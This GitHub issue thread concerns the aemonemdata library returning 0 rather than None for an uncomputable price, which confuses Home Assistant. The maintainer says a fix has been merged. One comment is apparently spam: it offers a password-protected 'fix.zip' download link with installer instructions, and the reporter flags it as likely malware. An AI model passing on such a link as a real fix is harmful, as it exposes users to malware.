### ISSUE TITLE
Estimated price is zero rather than None

### ISSUE THREAD

**Issue by Bre77** [cabberley/aemonemdata#1]
When the library cannot calculate an average it returns 0, but this causes issues for Home Assistant because 0 is a valid price.

I believe this should return None instead. Home Assistant handles this as unknown, and it won’t get confused with an actual zero price.

https://github.com/cabberley/aemonemdata/blob/a874bdac3aadd50c2c906632c8596533fb9169ec/src/aemonemdata/aemonem.py#L223

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bre77** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Pretty sure this is going to be malware.

**Comment by cabberley** [comment]
Thanks, have merged it and will push through new releases for the Python module and HA Integration shortly!
